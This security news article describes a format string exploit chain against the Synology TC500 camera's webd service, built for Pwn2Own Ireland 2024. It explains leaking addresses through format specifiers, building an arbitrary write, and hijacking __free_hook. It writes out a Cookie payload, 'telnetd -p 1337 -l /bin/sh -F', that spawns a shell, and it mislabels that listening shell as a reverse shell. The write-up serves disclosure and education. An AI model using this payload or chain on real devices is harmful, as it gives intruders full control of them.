Stack Canary, PIE, ASLR — All for Nothing: Bug Hunters Demonstrate Synology Exploit Bypass
Deep in the stack lay a door someone simply forgot to close.
Deep in the stack lay a door someone simply forgot to close.
In the fall of 2024, the bug hunting team at InfoSect was preparing an exploit for the Pwn2Own Ireland competition, targeting remote code execution on the Synology TC500 IP camera. The basis of their attack was a flaw in the implementation of string formatting, allowing them to bypass ASLR and gain full control over the device. Although Synology managed to patch the vulnerability at the last minute, the development of the exploit served as a powerful demonstration of how modern defenses can still be defeated.
The research began by analyzing the camera’s firmware, which was publicly available for download. Through emulation, the team explored internal services on the device: a civetweb-based web interface and an RTSP server. The primary focus became the webd process, which handles HTTP requests. Despite the presence of modern protections like PIE, RELRO, ASLR, and Stack Canary, a critical vulnerability was found in the process_new_connection function.
Synology had added a debugging mechanism to webd where each thread, when processing a request, logs the URI to a global table via the set_thread_name function. The issue? The value is formatted directly via mg_snprintf, with the URI used as the format string — without validating whether it contains format specifiers. This resulted in a classic format string vulnerability.
Although the direct output couldn’t be read back, stack analysis revealed that one pointer in the stack referenced the HTTP version string, which is sent back to the client. By modifying this reference using format specifiers like %[len]c%[pos]$n, the attackers were able to leak memory addresses, bypassing ASLR. The accessible range was limited to 0x50000000–0x60000000, but this was sufficient to leak addresses within the executable module.
The next phase involved arbitrary memory write. Leveraging stack pointers, the team built a pointer chain: p1 pointed to p2, and p2 to p3, which resided in a safe region of the stack. By incrementally altering the bytes of these pointers, they could redirect p3 to any desired address, enabling arbitrary data writes.
From this, the team built a basic arbitrary 8-bit memory writer, enabling them to modify memory contents and prepare an attack on the free() function from the glibc library.
Using the earlier memory leak and identifying the .got section, they calculated the location of __free_hook and replaced it with system(). To trigger free() with a crafted argument, they exploited the behavior of the GetSessionIdFromCookie function, which frees memory allocated for the Cookie header. If the Cookie contained, for example, the string:
telnetd -p 1337 -l /bin/sh -F
Then a call to free(cookie) would effectively execute:
system("telnetd -p 1337 -l /bin/sh -F");
— launching a reverse shell.
Although the attack wasn’t demonstrated at Pwn2Own due to Synology’s urgent firmware update, the exploit chain was a textbook example of how a single format string bug, when combined with glibc internals, can give attackers full control over a device — even in the presence of all standard modern defenses.
